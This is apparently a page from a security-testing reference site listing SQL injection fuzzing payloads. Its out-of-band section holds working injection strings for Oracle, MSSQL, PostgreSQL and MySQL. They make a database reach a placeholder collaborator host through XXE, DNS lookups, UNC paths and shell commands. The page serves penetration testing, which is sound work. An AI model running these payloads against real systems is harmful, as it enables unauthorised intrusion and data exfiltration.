> For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/sqli.md).

# SQLi

## General SQLi fuzzing

## Out-of-band fuzzing

```
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual--
SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')--
exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'--
copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a') SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'-- -
```
